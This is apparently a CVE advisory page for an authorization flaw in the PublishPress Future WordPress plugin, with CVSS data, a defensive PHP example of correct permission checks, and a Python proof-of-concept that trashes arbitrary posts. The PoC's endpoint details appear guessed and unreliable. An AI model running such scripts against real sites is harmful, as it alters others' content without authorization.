Security Vulnerability Report
CVE-2025-13149 CVSS 4.3 MEDIUM

CVE-2025-13149

Published: 2025-11-21 09:15:47
Last Modified: 2026-04-15 00:35:42

Description

The Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories plugin for WordPress is vulnerable to unauthorized modification of data due to a missing authorization check on the "saveFutureActionData" function in all versions up to, and including, 4.9.1. This makes it possible for authenticated attackers, with author level access and above, to change the status of arbitrary posts and pages via the REST API endpoint.
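The weakness here is CWE-862 (missing authorization): a REST callback that checks whether the caller may edit posts in general instead of whether they may edit the specific post named in the request. The following is an added illustrative example, not the plugin's own code, showing that weak permission check beside the corrected per-post check in a WordPress REST route that changes a post's status; the route namespace, function names and argument names are assumed.

```php
<?php
// Illustrative example, not the plugin's code: a REST route that changes a post's
// status, with the weak permission check beside the corrected one.
// Route namespace, function and argument names are assumed.

add_action('rest_api_init', function () {
    register_rest_route('example-plugin/v1', '/posts/(?P<id>\d+)/status', [
        'methods'             => WP_REST_Server::EDITABLE,
        'callback'            => 'example_save_post_status',
        'permission_callback' => 'example_can_edit_this_post', // not example_weak_permission
        'args'                => [
            'id'     => ['validate_callback' => fn($v) => is_numeric($v)],
            'status' => ['required' => true, 'sanitize_callback' => 'sanitize_key'],
        ],
    ]);
});

// WEAK (the CWE-862 pattern): asks only whether the caller may edit posts in general.
// Every Author holds 'edit_posts', so an Author would pass for any post ID.
function example_weak_permission(WP_REST_Request $request): bool {
    return current_user_can('edit_posts');
}

// CORRECT: 'edit_post' is a meta-capability resolved against the specific post,
// so an Author passes only for posts WordPress already lets them edit.
function example_can_edit_this_post(WP_REST_Request $request) {
    $post_id = (int) $request['id'];
    if (get_post($post_id) === null) {
        return new WP_Error('rest_post_invalid_id', 'Invalid post ID.', ['status' => 404]);
    }
    if (!current_user_can('edit_post', $post_id)) {
        return new WP_Error('rest_forbidden', 'You cannot edit this post.', ['status' => 403]);
    }
    return true;
}

function example_save_post_status(WP_REST_Request $request) {
    $post_id = (int) $request['id'];
    $status  = $request['status'];
    // Accept only statuses the site knows about, and gate publishing on its own capability.
    if (!array_key_exists($status, get_post_stati())) {
        return new WP_Error('rest_invalid_status', 'Unknown post status.', ['status' => 400]);
    }
    if ($status === 'publish' && !current_user_can('publish_post', $post_id)) {
        return new WP_Error('rest_forbidden', 'You cannot publish this post.', ['status' => 403]);
    }
    $result = wp_update_post(['ID' => $post_id, 'post_status' => $status], true);
    return is_wp_error($result) ? $result : rest_ensure_response(['id' => $post_id, 'status' => $status]);
}
```

The permission callback runs before the handler, so a request for a post the caller cannot edit is rejected with 403 before any status change is attempted.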

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PublishPress Future plugin < 4.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13149 PoC - PublishPress Future Unauthorized Post Status Modification
# Target: WordPress site with PublishPress Future plugin <= 4.9.1
# Authenticated attacker with author+ role can modify arbitrary post status

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"
username = sys.argv[2] if len(sys.argv) > 2 else "attacker"
password = sys.argv[3] if len(sys.argv) > 3 else "password"

# Step 1: Authenticate and get nonce
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {"log": username, "pwd": password, "wp-submit": "Log In"}
resp = session.post(login_url, data=login_data)

# Step 2: Get WordPress nonce for REST API
nonce_url = f"{target_url}/wp-admin/admin-ajax.php?action=rest-nonce"
nonce_resp = session.get(nonce_url)
nonce = nonce_resp.text.strip()

# Step 3: Exploit - Modify target post status via REST API
# Target post_id to modify (any post ID)
target_post_id = 123
new_status = "trash"  # Options: draft, publish, trash, private, etc.
api_url = f"{target_url}/wp-json/publishpress-future/v1/save"
exploit_data = {
    "postId": target_post_id,
    "newStatus": new_status,
    "nonce": nonce
}
resp = session.post(api_url, json=exploit_data)

print(f"Status Code: {resp.status_code}")
print(f"Response: {resp.text}")

if resp.status_code == 200:
    print(f"[+] Successfully modified post {target_post_id} to status: {new_status}")
else:
    print("[-] Exploitation failed")
```

References

https://github.com/publishpress/publishpress-future/commit/0cbefc1632c6f1fffc5fa0ca85e6b8a641d41c7f
https://www.wordfence.com/threat-intel/vulnerabilities/id/82ea0ebc-08aa-4ef5-b6b1-c7c13715ef6d?source=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13149",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-21T09:15:46.710",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories plugin for WordPress is vulnerable to unauthorized modification of data due to a missing authorization check on the \"saveFutureActionData\" function in all versions up to, and including, 4.9.1. This makes it possible for authenticated attackers, with author level access and above, to change the status of arbitrary posts and pages via the REST API endpoint."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-862" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/publishpress/publishpress-future/commit/0cbefc1632c6f1fffc5fa0ca85e6b8a641d41c7f",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/82ea0ebc-08aa-4ef5-b6b1-c7c13715ef6d?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```